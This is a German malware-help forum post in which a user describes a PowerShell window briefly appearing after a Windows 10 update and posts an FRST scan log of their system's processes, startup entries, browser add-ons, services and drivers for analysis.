Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)
-   -   Powershell-Fenster öffnet und schließt sich aus dem Nichts. Paranoia oder Befall? (https://www.trojaner-board.de/177887-powershell-fenster-oeffnet-schliesst-nichts-paranoia-befall.html)

Jerichoholic 15.04.2016 16:10
Powershell-Fenster öffnet und schließt sich aus dem Nichts. Paranoia oder Befall?
 
Hallo.

Gestern (Stunden nach dem großeren Win10 Update) öffnete sich recht unvermittelt beim Surfen/Idlen ein Powershell Fenster in der Taskleiste, was sich nicht maximieren ließ. In der Tab-Vorschau sah ich nur etwas Text, daher kann ich leider nicht genau sagen was dort genau vor sich ging. Nach ein paar Sekunden schloss es sich dann auch wieder. Die Googlesuche gab wenig dazu her, ich hab sowas aber auch noch nie gesehen. Das Einzige was zu der Zeit geöffnet war, war ein Java Fenster (Facebookgame), was eventuell damit offensichtlicher zu tun haben könnte.


Ich habe natürlich bereits einige Scans unternommen. (ADW Cleaner, MB, ESET, Avast und Bitdefender) Dummerweise habe ich ESET, Avast und Bitdefender wieder deinstalliert, da zuviele Scanner ja auch ihre Probleme machen. Leider habe ich also die Logs nicht mehr. Es waren durchaus ein Befunde dabei, die sich problemlos löschen ließen. Malwarebytes fand aber nichts, keine Befunde. Daher habe ich also leider keine weiteren Logs. :( Sorry. Dämlich, ich weiß.

Die Frage ist nun war das überhaupt ein Virenbefall, oder ist jener beseitigt? Hat jemand Erfahrungen mit Powershell-"Viren", oder kann das auch was ganz harmloses, anderes gewesen sein? Oder sollte ich sichergehen und direkt formatieren, wie 1-2 Threads zum Thema Powershell und Zugriffen empfehlen?

Im Folgenden nun aber immerhin meine aktuellen FRST Logs.

Danke.

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:13-04-2016
durchgeführt von Marcel (Administrator) auf MARCEL-PC (15-04-2016 16:46:22)
Gestartet von C:\Users\Marcel\Desktop
Geladene Profile: Marcel (Verfügbare Profile: Marcel & DefaultAppPool)
Platform: Windows 10 Pro Version 1511 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(mIRC Co. Ltd.) C:\mIRC\mirc.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Microsoft Corporation) C:\Windows\System32\WWAHost.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_2016.29.13.0_x64__8wekyb3d8bbwe\WinStore.Mobile.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_21_0_0_213.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_21_0_0_213.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2396096 2016-03-30] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3111880 2015-07-23] (Logitech, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-02-21] (Intel Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [594240 2016-01-13] (Razer Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7390096 2016-04-15] (AVAST Software)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-4129684494-242130120-1963887019-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3077712 2016-03-31] (Valve Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-03-15] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-03-15] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-03-15] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-04-15] (AVAST Software)
Startup: C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerReg Scheduler V3.exe [2015-11-29] (Leader Technologies)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog5 01 C:\WINDOWS\SysWOW64\napinsp.dll [55808 2015-10-30] (Microsoft Corporation)ACHTUNG: LibraryPath sollte sein "%SystemRoot%\system32\napinsp.dll"
Winsock: Catalog5 02 C:\WINDOWS\SysWOW64\pnrpnsp.dll [70656 2015-10-30] (Microsoft Corporation)ACHTUNG: LibraryPath sollte sein "%SystemRoot%\system32\pnrpnsp.dll"
Winsock: Catalog5 03 C:\WINDOWS\SysWOW64\pnrpnsp.dll [70656 2015-10-30] (Microsoft Corporation)ACHTUNG: LibraryPath sollte sein "%SystemRoot%\system32\pnrpnsp.dll"
Winsock: Catalog5 04 C:\WINDOWS\SysWOW64\NLAapi.dll [65024 2015-10-30] (Microsoft Corporation)ACHTUNG: LibraryPath sollte sein "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 05 C:\WINDOWS\SysWOW64\mswsock.dll [312160 2015-10-30] (Microsoft Corporation)ACHTUNG: LibraryPath sollte sein "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 06 C:\WINDOWS\SysWOW64\winrnr.dll [23552 2015-10-30] (Microsoft Corporation)ACHTUNG: LibraryPath sollte sein "%SystemRoot%\System32\winrnr.dll"
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 192.168.2.1
Tcpip\..\Interfaces\{9d1aac17-1c20-4668-84ec-35b2293b8911}: [DhcpNameServer] 192.168.2.1 192.168.2.1

Internet Explorer:
==================
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-03-15] (Microsoft Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2015-07-23] (Logitech, Inc.)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-03-15] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\OCHelper.dll [2016-03-15] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-27] (Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2015-07-23] (Logitech, Inc.)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\GROOVEEX.DLL [2016-03-15] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-27] (Oracle Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-08-21] (Microsoft Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\MSOSB.DLL [2015-08-21] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF DefaultSearchEngine: Google
FF Homepage: about:newtab
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_21_0_0_213.dll [2016-04-08] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-08-21] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_213.dll [2016-04-08] ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-03-20] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-03-20] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-27] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-27] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-03] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\NPSPWRAP.DLL [2015-08-21] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-03-22] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-03-22] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-4129684494-242130120-1963887019-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Marcel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS)
FF SearchPlugin: C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\5haul1vj.default\searchplugins\imdb.xml [2015-11-30]
FF SearchPlugin: C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\5haul1vj.default\searchplugins\youtube.xml [2015-11-30]
FF SearchPlugin: C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\imdb.xml [2015-11-30]
FF SearchPlugin: C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\youtube.xml [2015-11-30]
FF Extension: IMDB  Search - C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\{c4080853-c699-4120-b8e0-618bff8a4474}.xpi [2015-11-30]
FF Extension: MPEG4 Notifier Free - C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\5haul1vj.default\Extensions\{2bf26d56-57a2-4c13-b345-7711612bce55}.xpi [2016-01-06] [ist nicht signiert]
FF Extension: IMDB  Search - C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\5haul1vj.default\Extensions\{c4080853-c699-4120-b8e0-618bff8a4474}.xpi [2015-11-30]
FF Extension: Adblock Plus - C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\5haul1vj.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-01-20]
FF Extension: Adblock Plus - C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-02-24]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-04-15]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2015-08-21] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF

Chrome:
=======
CHR Profile: C:\Users\Marcel\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Marcel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-03]
CHR Extension: (Google Drive) - C:\Users\Marcel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-03]
CHR Extension: (YouTube) - C:\Users\Marcel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-03]
CHR Extension: (Adblock Plus) - C:\Users\Marcel\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-04-12]
CHR Extension: (Google Search) - C:\Users\Marcel\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-03]
CHR Extension: (Google Docs Offline) - C:\Users\Marcel\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Marcel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-12]
CHR Extension: (Gmail) - C:\Users\Marcel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-03]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-04-15]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [243296 2016-04-15] (AVAST Software)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2828016 2016-02-09] (Microsoft Corporation)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-03-30] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887232 2014-01-31] (Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-03-20] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-25] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-03-20] (Intel Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-03-30] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-03-30] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-03-30] (NVIDIA Corporation)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [57856 2016-01-11] (Razer Inc.) [Datei ist nicht signiert]
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-01-08] (DEVGURU Co., LTD.)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6942480 2016-03-02] (TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-04-15] (AVAST Software)
S1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-04-15] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [107792 2016-04-15] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-04-15] (AVAST Software)
S0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-04-15] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-04-15] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [465792 2016-04-15] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [166432 2016-04-15] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [287528 2016-04-15] (AVAST Software)
S3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2015-11-29] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\drivers\dtliteusbbus.sys [47160 2015-11-29] (Disc Soft Ltd)
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2016-02-06] (GFI Software)
R3 ISCT; C:\Windows\System32\drivers\ISCTD.sys [44744 2014-02-03] ()
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [129312 2014-09-30] (Intel Corporation)
S0 ngvss; C:\Windows\System32\Drivers\ngvss.sys [161760 2016-04-15] (AVAST Software)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-03-30] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [56384 2016-03-21] (NVIDIA Corporation)
R3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-23] (Razer, Inc.)
R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [130880 2015-12-15] (Razer, Inc.)
S3 vpnva; C:\Windows\System32\drivers\vpnva64-6.sys [52592 2015-07-22] (Cisco Systems, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
U3 idsvc; kein ImagePath

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-15 16:46 - 2016-04-15 16:46 - 00023246 _____ C:\Users\Marcel\Desktop\FRST.txt
2016-04-15 16:39 - 2016-04-15 16:46 - 02375168 _____ (Farbar) C:\Users\Marcel\Desktop\FRST64.exe
2016-04-15 12:02 - 2016-04-15 12:02 - 02113584 _____ C:\Users\Marcel\Downloads\winrar-x64-531d.exe
2016-04-15 12:02 - 2016-04-15 12:02 - 00242344 _____ C:\Users\Marcel\Downloads\Firefox Setup Stub 45.0.2.exe
2016-04-15 11:38 - 2016-04-15 11:38 - 18447464 _____ (Microsoft Corporation) C:\Users\Marcel\Downloads\MediaCreationTool.exe
2016-04-15 11:38 - 2016-04-15 11:38 - 00000000 ___HD C:\$Windows.~WS
2016-04-15 11:07 - 2016-04-15 11:08 - 287166268 _____ C:\Users\Marcel\Desktop\Documents.rar
2016-04-15 01:31 - 2016-04-15 01:31 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini
2016-04-15 01:30 - 2016-04-15 01:30 - 01070904 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSnx.sys
2016-04-15 01:30 - 2016-04-15 01:30 - 00465792 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys
2016-04-15 01:30 - 2016-04-15 01:30 - 00398152 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2016-04-15 01:30 - 2016-04-15 01:30 - 00287528 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswvmm.sys.146067662525001
2016-04-15 01:30 - 2016-04-15 01:30 - 00287528 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswvmm.sys
